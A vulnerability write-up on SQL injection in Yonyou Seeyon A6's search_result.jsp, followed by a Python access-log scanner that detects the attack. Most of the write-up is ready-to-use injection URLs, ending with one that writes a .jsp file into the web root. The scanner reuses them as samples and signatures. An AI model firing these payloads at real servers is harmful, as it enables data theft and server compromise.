Yonyou Seeyon A6 Collaborative Management SQL Injection

The injection occurs in the docTitle parameter of search_result.jsp.

http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc

Query the table names:

http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc

Because the program is an integrated default installation, the web path can be guessed:

http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/@@datadir,2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc

Based on OA installation path information found online, the web path is assembled as:

d:\UFseeyon\OA\tomcat\webapps\yyoa

Write a file directly with dumpfile:

http://xxxxxx测试数据/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/'test',2,3,4,5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test.jsp'/**/from/**/mysql.user/**/limit/**/1%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc

Fix: filter dangerous characters.
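For reviewing web server logs for the requests shown above, the following is an added example (not code from the original post or from the vendor) that scans access-log lines for SQL constructs in the docTitle parameter of search_result.jsp. The log format, sample lines, signature names and function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/yyoa/oaSearch/search_result.jsp"   # endpoint named on this page
TARGET_PARAM = "docTitle"                           # injectable parameter
# SQL constructs from the requests above, matched after normalisation.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "server_variable": re.compile(r"@@\w+"),
    "file_write": re.compile(r"\binto\s+(?:dumpfile|outfile)\b"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /yyoa/oaSearch/search_result.jsp?docType=doc&docTitle=budget+report&goal=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /yyoa/oaSearch/search_result.jsp?docType=doc&docTitle=1%27and/**/1=2/**/union/**/all/**/select/**/user(),2,3,4,5%23&goal=1 HTTP/1.1" 200 4800',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /yyoa/oaSearch/search_result.jsp?docType=doc&docTitle=test%27and/**/1=2/**/union/**/all/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables%23&goal=1 HTTP/1.1" 200 9100',
    '203.0.113.9 - - [01/Jan/2024:10:03:00 +0000] "GET /yyoa/oaSearch/search_result.jsp?docType=doc&docTitle=test%27and/**/1=2/**/union/**/all/**/select/**/%27test%27,2,3,4,5/**/into/**/dumpfile/**/%27d:/UFseeyon/OA/tomcat/webapps/yyoa/test.jsp%27/**/from/**/mysql.user/**/limit/**/1%23&goal=1 HTTP/1.1" 200 4700',
]

def normalise(value):
    """Lower-case, then collapse /**/ comment padding and whitespace to one space."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan_line(line):
    """Return the signature names matched in docTitle for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != TARGET_PATH:
        return []
    hits = []
    for raw in parse_qs(url.query, keep_blank_values=True).get(TARGET_PARAM, []):
        text = normalise(raw)          # parse_qs has already percent-decoded the value
        for name, rx in SIGNATURES.items():
            if rx.search(text) and name not in hits:
                hits.append(name)
    return hits

def scan_log(lines):
    """Return {line_number: [signature names]} for lines with at least one hit."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := scan_line(line))}

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

A file_write hit warrants checking the web root for unexpected .jsp files, since that request writes into webapps/yyoa.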
